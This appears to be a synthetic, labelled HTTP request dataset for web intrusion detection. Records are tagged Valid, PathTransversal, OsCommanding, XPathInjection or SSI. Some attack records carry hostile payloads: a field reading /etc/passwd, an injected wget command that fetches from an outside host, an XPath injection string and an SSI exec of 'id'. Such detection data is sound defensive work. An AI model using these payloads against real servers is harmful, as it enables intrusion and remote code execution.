Expect: lwca=m8sg;eeCw
From: ls2l@ewemlDhle.org
If-Modified-Since: Mon, 11 Jul 05 01:06:20 GMT
If-Unmodified-Since: Tue, 03 Jun 08 01:28:30 GMT
If-Match: *
If-None-Match: "SErLrC-h0mfVzu5J."
If-Range: Sat, 03 Mar 07 21:37:25 CET
Max-Forwards: 1
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Qyeeu qzNllaee=zsachi
Authorization: Basic Z2Rpb25vcXk6aEl0MFVwc3I=
Range: -2,795-,-91
Referer: /ahset7/cahhut/oer1Qa/dcsS2ife/reugii.mdb
TE: trailers
Trailer: Referer
User-Agent: Mozilla/3.6 (X11; U; Open BSD i386 7.0; 93-lz; rv:6.4.8) Gecko/96512801
UA-CPU: x86
UA-Disp: 603,719,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2346x026
Via: 2.6 www.0ixttae.png, 4.0 142.223.244.108:76143, 2.0 www.asaur.gif
Transfer-Encoding: identity
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 278 147.254.183.64 "ie6mtt" "Mon, 03 Apr 06 21:50:29 CET"
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 0238544076735030129
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43979
Start - Id: 11668
class: Valid
GET /odRBLvoIG_qP9gf/i8p4I387bv-vdP5Xt-q/fwkjoesnttalev/psicpe6dqs1t/bf/7Nvded7nbtnTR/asci8aearahhhf/juhe1tni.gif?be9ec=ulrRr&htTsoc=ndsso&Nk6SoA0aWV=A%28netcat%25hr%2Farl&sgtq8h=277915982&n8OsLhavingnfVmaila=33o%3BtEall&oi=95&NKS4L=5452447&ndntuNcts=2389&h8efUkletnn=dR70inz&SZNp6liken=ey%40c6eo%24&BaoupdatePDXtmpZ2=lo_vzrwHJp&e4eao6a0s=do-lf&nbfyL89o=ur HTTP/1.1
Host: 116.14.82.168:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: t2a-nHe, to-iaezukon, ac-E6Ie;q=0.4, xyfl-tc;q=0.3
Cache-Control: t8=retIjw
Client-ip: 154.229.78.49
Cookie: rtRer=2;manwho5b=sobrfdisg;raws=89941726;l1dI=65;cmlehtess=< ;sq=y5eenx460dorh
Cookie2: $Version="1"
Date: Tue, 25 Apr 06 17:20:43 CET
ETag: W/"NeTWZ@uyDDwlmMX13_"
Expect: 452R=tueo;xlqire
From: ufw0isn@wEgaa4o.uk
If-Modified-Since: Wed, 17 Mar 10 05:15:38 CET
If-Unmodified-Since: Tue, 07 Feb 06 11:35:40 GMT
If-Match: *
If-None-Match: "EsewMFDLuH.m.OT7CX"
If-Range: "v.59m-aagye789YQXq-"
Max-Forwards: 366
MIME-Version: 2.8
Pragma: q='l'
Proxy-Authorization: Basic dXRybmsyOm5ldGljdA==
Authorization: hasn a4ec0=BC1tkar
Range: 93-2855,61-3
Referer: /nndag/trs4i8hn/nnislhn/yLEueh.jsp
TE: chunked,chunked,gzip
Trailer: Pragma
User-Agent: Mozilla/5.9 (Windows; U; Windows NT 1.3; eE-hD; rv:9.4.7) Gecko/51202232
UA-CPU: PowerPC
UA-Disp: 940,7536,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 178x213
Via: 2.8 7.20.223.23
Transfer-Encoding: gzip
Upgrade: iocd/6.9, Dmvo/9.9, oft/0.7, lu4Hrr/7.4
Warning: 318 www.Rhiz.jpg "bsgHd0hphtRurndnaw4e" "Tue, 20 Jan 04 23:26:26 UTC"
X-Forwarded-For: 108.9.67.15
X-Serial-Number: 2344723441
----: -------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 11668
Start - Id: 46076
class: PathTransversal
POST /GOqjhttpA1zfdtum/ojolee.jpg? HTTP/1.1
Content-Length: 225
Content-Language: tbe,qi
Content-Encoding: identity
Content-Location: http://www.eotcoe.be/n2Si3sog.cgi
Content-MD5: YWRkZmxxZWFlcG50Y2NOYQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Tue, 04 Jul 06 22:10:31 GMT
Host: www.5ee2Irs.fr:8672
Connection: raregmc
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: gzip, deflate, deflate;q=0.3, gzip;q=0.9, gzip
Accept-Language: Eot4heit-o1L;q=0.4, nt-im;q=0.3, ierma-sun, ohmtuo-Bdn, Rua-thgo
Cache-Control: only-if-cached
Cookie: P5njS-TXevalCs=66543416
Cookie2: $Version="592"
Date: Thu, 18 May 06 10:51:13 GMT
Expect: etctA7v=4nygoels
If-Modified-Since: Tue, 28 Apr 09 19:11:46 GMT
If-Match: *
If-Range: Mon, 07 Feb 05 15:11:10 CET
Max-Forwards: 815
MIME-Version: 9.9
Authorization: NTLM ZGo5c2V3cGlyaXphY2VSdHJ0cGVla2FuVERnMWF0bmZzU0NN
Referer: /tistnfte/zqsai/Hde6teds/yrl52.tar.gz
TE: trailers,trailers
User-Agent: Mozilla/7.7 (X11; U; Linux i386 6.1; e8-ad; rv:1.8.1) Gecko/82713836
Via: 1.3 241.105.230.25, 7.2 31.183.44.61
Transfer-Encoding: identity

tst5oahit7=nmMNo5B&nts=090075991&oimqeaeeastDt=nCZRseUglTS&3VBpgTi=d&e2wereu3oii=oe&afihmt=994&mviabovej=diMrkl6&inehs=97942&ymiqi5nesb=mnodehinserte|letdrmeTn&3hnsbgeip=5833&sxTgduheEswitW=/etc/passwd&wzngtFefg4=fbgsbe

End - Id: 46076
Start - Id: 20144
class: Valid
GET /dOsnrncHoin8nhy/Hla/nK7zo5PMfb3Wh/bensn/3nwetrpfD3IeI5beieo/5vcKBViada.r7./zYlcFCOr0ovUJQ1/Uat.rcpR.js?ed52hugsuj5=130668743&an=ttn3yjXYG-&pap5rFxhco=bd%27aeyto1tabost&susgtrl5tunoay=961&-CmtS=Tiankrar&unhi=eg4-lLy7-Z&leptunMSyewh=AersidZ&eoatiI=8iobnAnE%24%3B+led&t65murCnze=acatyer9%3Ep+t&e5eintoeons=93650&tmEhTrwUonn7Xd=al0qei&d3zXECJB0yCw=wo&WDs_0wlikezksT0=imeta%3Bmo+fOMub%29ln%24%3D+o%3E&Tb8abthlthAhk=064200 HTTP/1.1
Host: 214.91.111.191
Connection: close
Accept: video/*, audio/x-wav
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 112.70.151.93
Cookie: aeooemlaoti=s
Cookie2: $Version="2"
Date: Mon, 19 Jun 06 17:30:25 CET
ETag: W/"e79xNrsSJ4l28i@mqK"
Expect: lsdoo
From: np1ebr9@yntet.it
If-Modified-Since: Sun, 10 Jan 10 03:10:11 CET
If-Unmodified-Since: Sun, 01 Feb 04 13:22:46 GMT
If-Match: *
If-None-Match: "-WKy7zPF6ldKp7Yt4Z"
If-Range: Fri, 14 Jul 06 12:30:43 CET
Max-Forwards: 9
MIME-Version: 8.3
Pragma: u=Eaeoe
Proxy-Authorization: Basic TmVyaWI6YU11c24=
Authorization: Digest username="aodtd"
Range: 48910-875971,804755-62
Referer: http://k8wzsih.cz/uwrht/aste2f.jpg
TE: trailers,deflate
Trailer: Date
User-Agent: e4tOasee/4.1
UA-CPU: Sparc
UA-Disp: 972,951,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2245x9664
Via: HTTP/3.8 www.inrh.shtml, FTP/1.9 www.smtlares.css, nei/7.2 115.45.24.105
Transfer-Encoding: gzip
Upgrade: gsxSw/8.7, hxstE4/2.5, thn/2.2, tad/9.4, rii/8.9
Warning: 998 www.ttRcoh91.jpeg "bE5Jru" 
X-Forwarded-For: 147.125.181.72
X-Serial-Number: 67193575872
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20144
Start - Id: 18134
class: Valid
GET /bSgdmmiaasu27sctoinr/6DcselectKTsia6C2uC.php3?0s5sisSdeenmeeo=358786984&2frhcb=2MeeC2fyE&QVyGjMMeval=csair2e&8sMT=dtaHlhJ HTTP/1.0
Host: 202.233.208.223
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-8859-2;q=0.5, shift_jis;q=0.5, euc-jp;q=0.4
Accept-Encoding: deflate;q=0.4
Accept-Language: 3ie-uzietoi;q=0.0
Cache-Control: no-transform
Client-ip: 165.189.39.9
Cookie: eIt0ir=128407;anroelavabccae=eThwvNL;eznepasswdDpxCbd=ea;Fnt=30553;o4=10636
Cookie2: $Version="59"
Date: Fri, 08 Apr 05 01:54:06 UTC
ETag: "U3bc0i@lh44zJzCiBrB"
Expect: Utfnw=cn4c;cent
From: hwDyshr1@ecneonN.be
If-Modified-Since: Sat, 06 Nov 04 21:05:55 CET
If-Unmodified-Since: Sun, 06 Jul 08 14:34:58 GMT
If-Match: "Rdmzd4rA4xPbCWFK-RH"
If-None-Match: "2s4ZMmM-ATXHCMGUXQ"
If-Range: Tue, 19 May 09 10:51:52 GMT
Max-Forwards: 63
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic NWFvOGdmOmd0Y3Fh
Authorization: sei5oa oswEzush=tipl
Range: -69064,75-37,650952-
Referer: http://9z8wcl.cz/viyt.mp3
TE: trailers
Trailer: From
User-Agent: v7pfGgy http://www.aretdr.st
UA-CPU: Sparc
UA-Disp: 2247,5505,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 4181x6520
Via: FTP/3.3 211.251.1.239
Transfer-Encoding: gzip
Upgrade: EqxgAe/7.5, mwiE09/4.9
Warning: 452 79.243.217.186 "hitq" 
X-Forwarded-For: 7.193.95.179
X-Serial-Number: 1346514779
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18134
Start - Id: 43352
class: OsCommanding
GET /es3paghrtBa/oaihCr8omeyjsteevE/FV.shtml?2oors1haAewg=ehsMhtbisHgsp&SBaaX=8nE9%40rpE7gmr&kdiseeC8boqsah=tvhlveypechoiframe%28e&nccmseOletR=%22+%3B+%2Fusr%2Fbin%2Fwget++++www.ndetesna.com%2Fle++++%3B&1DhdYXlsE=Toii HTTP/1.0
Host: www.ndsunrf.be
Connection: htv5hs
Accept: */*
Accept-Charset: iso-8859-8-i
Accept-Encoding: compress, gzip, compress;q=0.8
Accept-Language: *;q=0.2
Cache-Control: max-age=79
Client-ip: 39.142.10.38
Cookie: 0ain= i7q8;pofnewtohie=inracn6yrot;98AformR=SaosAtcieuUeeoh3
Cookie2: $Version="9"
Date: Sat, 24 Jan 04 13:24:28 GMT
ETag: W/"c0Z7lsrQ4i2uF5KhW"
Expect: 100-continue
From: tz687o@hnoaaeiE.it
If-Modified-Since: Mon, 04 Apr 05 03:14:10 GMT
If-Unmodified-Since: Sun, 17 Oct 04 11:58:56 GMT
If-Match: *
If-None-Match: "5Xm4-j6QM8jjuTm-lF"
If-Range: Wed, 28 Apr 04 20:14:54 GMT
Max-Forwards: 9754
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="faby1"
Authorization: ilfe8 aoOeoE=oetOtoI
Range: -3
Referer: http://ndptrEs.fr/Rok1eO/efEa/hhgr/nalayre/1slot.mpg
TE: trailers
Trailer: If-Range
User-Agent: ib-Juv http://www.4aoqrtP.net
UA-CPU: 68000
UA-Disp: 106,481,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 331x628
Via: HTTP/2.9 www.6dgnsep.js
Transfer-Encoding: identity
Upgrade: kxea/4.4, ru5/6.4, ttftd/1.9
Warning: 476 114.93.136.20 "eSSt" 
X-Forwarded-For: 246.239.174.69
X-Serial-Number: 3733669583698502
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43352
Start - Id: 11225
class: Valid
GET /oG7NEv1pfkFtE.asp?aagfoohrime=nchms5e2tchild7&hoop4q=l0eayOscy2hleot&cxqU-9CVib5e=5melne3arfk&aoYiJi=7&orVhno0e7=8678147&dtrnyoatieyte=%5Brehva%2BtT%3CiCan&tsoY=851299&9e=rs&p2positionKyZ=wGt8yMj&Ql9dnd=cciLaZsenanewf2x&eo9IjnevNel=+Pu&I9-sIlike5sXUdocument=0477774036&oepwnth2=e&e3V9fromilikej3ugR=20886225&lZB=4 HTTP/1.1
Host: 228.72.195.225
Connection: keep-alive
Accept: audio/*;q=0.4
Accept-Charset: x-mac-hebrew
Accept-Encoding: identity
Accept-Language: te-9t, rHhr-sit, stK-ott;q=0.2
Cache-Control: T='ert'
Client-ip: 59.66.86.162
Cookie: wcenytan5=ogsbvswhereeyecHmeo;l2aA=1344270;srtny=271;jrehcwoyiw=9;enhiaseOl=95716;daosrdwpni=aNceodhhhlLhtohoxM
Cookie2: $Version="795"
Date: Sun, 19 Jul 09 18:52:21 CET
ETag: W/"J@-xoRm3F8@@U@TlCC"
Expect: Tate=neh0r;anor
From: gHtTgn@sure9wme.de
If-Modified-Since: Wed, 10 Oct 07 04:42:07 UTC
If-Unmodified-Since: Thu, 04 Feb 10 08:14:20 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 02 Jan 09 21:49:26 GMT
Max-Forwards: 59
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Basic c2VzaEQ6Y2FBdA==
Authorization: Digest opaque="titAudh"
Range: -62895,1183-7810
Referer: http://nomtuega.be/utlcE/ifnori.asp
TE: trailers,trailers,trailers
Trailer: From
User-Agent: Mozilla/3.3 (Windows; U; WinNT 2.5; re-ot; rv:1.4.3) Gecko/89751068
UA-CPU: 68000
UA-Disp: 7122,239,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 689x7201
Via: 0.2 www.i8Scais.shtml:3016, 9.0 5.190.238.163, 9.5 48.233.3.8
Transfer-Encoding: deflate
Upgrade: uCt/3.1
Warning: 482 www.nt5e.js "raopnnI2epacwex" "Sun, 04 Jan 04 12:41:28 CET"
X-Forwarded-For: 196.44.53.29
X-Serial-Number: 450563801661696804
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 11225
Start - Id: 18495
class: Valid
GET /Hj6Ns-cMF1F8GH/t5SfBhsy7f_9Y/ne/nnttdwtn/tnoie/V-7Fg1os_3/vfnatzqcoh1eE/oITM8ILUyFnullt/RhgxonbyeW1nra04qh0r/tyNf/yiDLX79fUtpp1FBB.php?Theoem=caeues9zddrop&ttwoe=orofposition HTTP/1.0
Host: www.eeaedhy.biz:80
Connection: close
Accept: */*
Accept-Charset: x-mac-icelandic, big5;q=0.0, iso-8859-8;q=0.4, iso-8859-6;q=0.2, ks_c_5601-1987;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: yasot5t='gnAihu'
Client-ip: 117.52.42.62
Cookie: ltti1b3er=minn3;awsOsu=2;evalJHform=44385478;3xmolpvot=2678322254;5noiluo=422174
Cookie2: $Version="2"
Date: Thu, 24 Jan 08 18:30:50 UTC
ETag: "GjE4fP-LZWsUJczsc"
Expect: 100-continue
From: eocete@3mtoie.org
If-Modified-Since: Tue, 11 Jan 05 10:56:13 CET
If-Unmodified-Since: Wed, 27 May 09 17:59:23 GMT
If-Match: "6h2fzQolgIA-aa8"
If-None-Match: "lD92KjCCYFpTEdwY22"
If-Range: Mon, 11 Jul 05 21:28:18 UTC
Max-Forwards: 73
MIME-Version: 4.1
Pragma: stsioln='ssaMd4Ix'
Proxy-Authorization: Digest cnonce="3jshnz"
Authorization: Basic YW5sbnVCbzpzZWVyN290
Range: 85-,-50971,7583-04
Referer: /Rimoe/ygyuD/ot1a/esat/nSeoGt.css
TE: deflate;q=0.1,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/1.2 (X11; U; Open BSD i386 1.5; eo-te; rv:5.3.9) Gecko/81256925
UA-CPU: PowerPC
UA-Disp: 1147,7434,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 934x751
Via: 3.0 www.c7sno.jpeg, 4.2 199.208.108.217:6, FTP/9.9 www.oLEosot.png
Transfer-Encoding: oewL
Upgrade: ryat/0.4, gavm/5.1, n8hana/0.1
Warning: 975 www.T3nto.html "tmezsAhMh3o5uamnt0or" 
X-Forwarded-For: 81.60.123.231
X-Serial-Number: 100961283776
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18495
Start - Id: 49219
class: XPathInjection
GET /nlK1@mqAVy/uxlike/4nFY0RTGZ.pl?dDgEebuvar=rgaace&q0EJiFAM2.6home=tp6%40qH&uuaittnoVXnml=79+or+++++e8aerA%2Ff%2FoaSvp%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D594%5D+++++or+1799%3D HTTP/1.0
Host: 226.99.255.118
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: koi8
Accept-Encoding: gzip, compress
Accept-Language: nfaS-Utxyy;q=0.4, otnsoqy-gs, esJelme-oee;q=0.6, aCrsnas-NElcfso;q=0.2, OeEdu-dbtnobH;q=0.4
Cache-Control: max-stale=393
Client-ip: 214.106.9.213
Cookie: KsiRT=eibsm;jayag=47618;A38m-eMlG=ec;hA6nieshR=earf;erhs=cabutsrb
Cookie2: $Version="95"
Date: Fri, 18 Sep 09 03:39:20 GMT
ETag: W/"wAUDMUpn_TbvD5aG66"
Expect: 100-continue
From: 92fxf@rrjet00.biz
If-Modified-Since: Wed, 05 Jul 06 01:14:10 GMT
If-Unmodified-Since: Fri, 03 Oct 08 09:10:55 GMT
If-Match: *
If-None-Match: "oMgVJMZ8dtgAJxGiifb"
If-Range: Wed, 25 Nov 09 17:33:55 CET
Max-Forwards: 3969
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic MWd0YTpydGplZWl3
Authorization: NTLM NldvSWhnaGRJaXNuMTNtZ2VvMzdzb2xhdG5tZnJ1cnRwbGxleG9haWlTemx0
Range: -392691
Referer: http://www.stadAep1.ch/l9erpN7/lhonaa0.php
TE: trailers
Trailer: Authorization
User-Agent: ueul7nna
UA-CPU: StrongARM
UA-Disp: 2354,727,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 6245x946
Via: HTTP/6.8 180.151.109.118:978, 7.7 60.123.230.244
Transfer-Encoding: deflate
Upgrade: wtrfa/2.8, tto/9.5, nvs/5.2
Warning: 724 17.92.63.205 "uiDhIxbYiobgTemr" "Thu, 31 Jul 08 08:16:12 CET"
X-Forwarded-For: 104.165.218.9
X-Serial-Number: 094897870
----: ------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49219
Start - Id: 31018
class: Valid
GET /rti/nA1DeS3/xnidtYQrEaE6t/kwhere/rlAValkP9/cz9279ca-dozXg/eunfh/autJa0/e2T-9f/Wwindow.openg5htpasszgy_A1.msf? HTTP/1.1
Host: 123.9.35.75:303
Connection: keep-alive
Accept: image/png;q=0.3
Accept-Charset: *;q=0.0
Accept-Encoding: compress;q=0.1, compress, deflate;q=0.6, identity, identity
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 154.71.85.33
Cookie: NEsq=4471;3IE9PBwd=4
Cookie2: $Version="98"
Date: Sun, 05 Aug 07 12:53:42 CET
ETag: W/"3UcaAjaeWeHVa3QgvT@"
Expect: 0irxrl
From: iqyoom@ptIe99oiss.be
If-Modified-Since: Thu, 16 Jun 05 15:27:58 CET
If-Unmodified-Since: Thu, 08 Jul 04 09:06:34 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 21 Feb 08 12:51:25 GMT
Max-Forwards: 97
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="VltR"
Authorization: NTLM bnBzb2Vlb28yamRhU0FpbHVzdGVvYzllVUVpYjl0aHM0bGVvZXRuZThzaWx1ZQ==
Range: 74-93290,6-30238
Referer: http://www.yfeptem.biz/sogN/cwwi/oenthht/narfletn/Gpt0o.jpeg
TE: gzip,chunked,chunked
Trailer: If-Unmodified-Since
User-Agent: ePxMyttdnipeepso
UA-CPU: MIPS
UA-Disp: 584,4814,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 777x272
Via: FTP/8.0 65.152.239.50
Transfer-Encoding: compress
Upgrade: lkT/4.2, nRs4h/2.7
Warning: 980 40.231.45.223 "yehno5e2" "Fri, 14 May 04 01:40:34 CET"
X-Forwarded-For: 175.214.29.11
X-Serial-Number: 76093774
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31018
Start - Id: 490
class: Valid
GET /mxmli2/aGEYLrqTyU-krO5f/zT1n1U0AJ5l364HVUPX/rboot.iniyr0K/GQ/s12vfiEonii7i9/i.CvZxd4tADxpuc.tiff? HTTP/1.0
Host: 152.170.125.166
Connection: imiBn
Accept: */*;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 252.232.112.111
Cookie: bwe=selecteIs(ihbst0wiAn;ws0=812140;pprocessing-instructionor7copynfqqmB=bA_e3;mgdxodfnnf=mu4mV_
Cookie2: $Version="20"
Date: Fri, 12 Dec 08 13:48:07 UTC
ETag: W/"2jX3v6ODufFEfT4.U4"
Expect: 4hbnAv=e8b15;riTcolse
From: galnhlb@rtpbreUei.com
If-Modified-Since: Mon, 06 Jul 09 03:03:09 CET
If-Unmodified-Since: Mon, 20 Apr 09 16:25:02 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 19 Apr 05 21:41:39 CET
Max-Forwards: 93
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: NTLM aG5pRmhlbmhyYXNsSTF5dGNhZXlvaXJybmVvZDkzcklpaWg5cG90YVNlbA==
Authorization: Digest realm
Range: 648-,41963-027
Referer: http://www.prihlm.biz/lOzs/aueo6mt.aspx
TE: chunked
Trailer: From
User-Agent: Mozilla/0.4 (Windows; U; Windows NT 6.8; ej-yu; rv:6.4.2) Gecko/53468024
UA-CPU: StrongARM
UA-Disp: 506,620,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2278x9542
Via: 1.0 12.4.217.69, 1.8 www.Ekrmfe.htm
Transfer-Encoding: deflate
Upgrade: aSogue/8.0, amz8to/3.6, rManti/2.8, samftt/0.2
Warning: 352 31.207.183.24 "neoljnBeiishclymndas" "Mon, 23 Jun 08 21:00:26 CET"
X-Forwarded-For: 66.116.137.221
X-Serial-Number: 9170010950
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 490
Start - Id: 34580
class: Valid
POST /edesil93/enTAqjBf4d2PbviIoY@q/m6Q8aX/27KOqM3M4ZpE/Xctelnet/nskzsuleA/icdnqs08.js? HTTP/1.1
Content-Length: 267
Content-Language: Esej,ts8wi5dr
Content-Encoding: compress
Content-Location: /Ahfwwo/raDtg1e/nretmf0/webadh.conf
Content-MD5: dDVzcnNuZ25sbjBkNGZsdA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 14 Sep 06 14:16:05 GMT
Last-Modified: Sat, 16 Jun 07 07:22:24 GMT
Host: 229.85.120.23:90602
Connection: keep-alive
Accept: video/mpeg;q=0.9
Accept-Charset: windows-1251;q=0.3, cp-936, hz-gb-2312, iso-8859-3;q=0.8
Accept-Encoding: deflate;q=0.6, gzip;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 33.195.206.96
Cookie: rcs=e51i oes i98l e;uoOts0ln=r0Lh9ulltmh4r1;8xhi=02;esrsBNgiSeT=tltetWFooa )o
Cookie2: $Version="5"
Date: Mon, 25 Jan 10 14:54:53 UTC
ETag: "0HqDSBh.Wpdg61sLLkXC"
Expect: 100-continue
From: Oaodnbea@frlfa.ch
If-Modified-Since: Thu, 03 May 07 12:39:04 UTC
If-Unmodified-Since: Sat, 20 Sep 08 06:08:45 GMT
If-Match: "aca-nNACHRSvBLeL@U"
If-None-Match: "l8LJX2x@j-6Klu1V"
If-Range: "LZejWqb_H6KlthAfPdcc"
Max-Forwards: 0
MIME-Version: 1.5
Pragma: 7ys='tw0'
Proxy-Authorization: aueh h6ywlel=day6os
Authorization: Digest qop=auth
Range: 1867-,-2727
Referer: /t7ant8we.png
TE: trailers
Trailer: Date
User-Agent: hy6uNu http://www.nhup.uk
UA-CPU: PowerPC
UA-Disp: 518,1124,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 512x9817
Via: HTTP/1.3 255.47.18.106, 1.9 www.rta8nte.js
Transfer-Encoding: anen
Upgrade: Qodwe/1.4, 5thx7/5.2, EeTnts/6.6
Warning: 167 www.rhqsT.css "8mTr" 
X-Forwarded-For: 7.90.1.179
X-Serial-Number: 8498191575866
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ya=7&jiXTtoooxedbnu=8&jklMSQJxi=decscript&4tseclTqEl=oD.x8I67&issaicae=99780914&iiaUer=tFs2h2Teow&ndgt4h2nm7esIy=rfodiA4tssnOuaousr&l0Cchs0rs=37670&tniMmaaEiN=5907022&eCZ2=tsedfc2i si<m|&8HyGkdVq-fimgp=)lm&9aQ0tlhoacseI=thogabPo&m-SyMKut=oIDTe&fewaeelah=htacces

End - Id: 34580
Start - Id: 22874
class: Valid
GET /tazha5Co9Zr.0xiJp/piusomnesserd4T/ehsnea.jsp?nlciIpirauhwrf=B9%3B1e4a++d++&hits0auclotonee=xwinntgigl3U1harame&nrndlr9anmztBer=passthrui6e7oeu%7Cdy8ruho&elatj=5835053468&toeaaic=z&ixtE09oLhC8sla=%2Fbltmp&FrehH1mt=182223385&4Yxg5ejX8=HNmy&wrsloi0edklesr=ruX3KZ6l7j&a5e4tew=ehbk.S&@Mms.v=10638&eesn9sTtenf8=4815036&NLtatrzhnxmae=9349126 HTTP/1.1
Host: www.stwa.gov
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ictti-niuoTr67;q=0.9, sdz93i-mgrbth, pl-efeee;q=0.3, L4-lee9
Cache-Control: max-stale=8
Client-ip: 160.174.199.86
Cookie: eeae=t1in\Oo(rai;gOX2_tnEa5ZJ=nMI5GlNPb;anlfeeuroa=4
Cookie2: $Version="80"
Date: Thu, 16 Jul 09 19:27:48 UTC
ETag: W/"6nKcYtlxwrlR7G10i6h"
Expect: eoevCite
From: ntsdz@D3mgaa.it
If-Modified-Since: Thu, 22 Jul 04 23:44:42 GMT
If-Unmodified-Since: Fri, 11 Aug 06 09:46:35 GMT
If-Match: "Ayx.5h-YAV6EEB6-GDs"
If-None-Match: *
If-Range: "1Wi56sPd5H0Kzj2o"
Max-Forwards: 3
MIME-Version: 6.6
Pragma: msdrsdng='iIidstTm'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: hNeio chsa=ze14
Range: -78,325-,-890033
Referer: http://www.eieetma.com/oneeeco/dnxooe/nonlsd/wsowe/ooiTar.html
TE: trailers,gzip;q=0.2
Trailer: Accept
User-Agent: Mozilla/2.3 (Windows; U; Windows NT 8.8; ny-wg; rv:1.2.5) Gecko/29011885
UA-CPU: StrongARM
UA-Disp: 533,0632,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 134x6878
Via: FTP/4.8 3.112.182.45, 2.2 189.250.45.179:4
Transfer-Encoding: identity
Upgrade: 6ahich/9.0, ixit/2.6
Warning: 312 56.128.98.138 "curonnltfRimjCnt" 
X-Forwarded-For: 68.104.33.155
X-Serial-Number: 426023548
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22874
Start - Id: 40113
class: SSI
GET /eUeodneolo2iedd/hei/inDRc1otsmrTo9ierqci.tiff?u4l=o%5Dote&oa5otcmQsS=i%3Di%25o%5Bnkryie%2FuE&jkefvZ=tncndrop&t1Mo=4stues&eatmaioftw4t=l4ZZB&nIKMDTECbO=%3C%21+++%23%3C%21--+++++%23exec++++cmd%3D%22id%22--%3E&nycsm5fvyi=rx7KZwWX8UV&vgtIM=wo35eceasea&iAHay=3&uec=648&28CJzbgsoundT=gt0+sTpsrszR HTTP/1.1
Host: www.etCsuyc.com
Connection: keep-alive
Accept: application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: htbi-tWdodc, ct7kt-aeuTrEs;q=0.2, oej-v;q=0.6, 9sM-Sn, tjei-lwjaix
Cache-Control: i9eiGAb=nr4iuel
Client-ip: 69.245.82.199
Cookie: jsbOsntiNfl=ehljhsysc;lw=95;1mAww=4993563;htneenDeE=2t;dtaNamamd7=6473
Cookie2: $Version="5"
Date: Tue, 15 Dec 09 16:54:26 CET
ETag: "DP7vfr99_OjKSyo"
Expect: 100-continue
From: ryup@srni.ch
If-Modified-Since: Sun, 16 Jul 06 23:40:26 UTC
If-Unmodified-Since: Wed, 10 Oct 07 23:00:49 CET
If-Match: "Vh_63pD2v1mh9G1d"
If-None-Match: "QBL6hjAmg7Mh1Slj"
If-Range: Sat, 17 Dec 05 20:19:29 UTC
Max-Forwards: 7843
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic b2hpbzJwOmh0cjI=
Authorization: lcb2Rh 8feofloz=9eso
Range: 01784-577,9-7,8678-
Referer: /eEuuihtz/nnnLl/seer/RWjtAryd/4snw.dll
TE: deflate
Trailer: Proxy-Authorization
User-Agent: haqaeuaasR (tncV05vx; 5XI.lLDS; n@Pwcj; 54-N19)
UA-CPU: 68000
UA-Disp: 3405,153,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7286x8366
Via: 3.9 238.176.162.116, FTP/7.3 www.eegmcn.htm
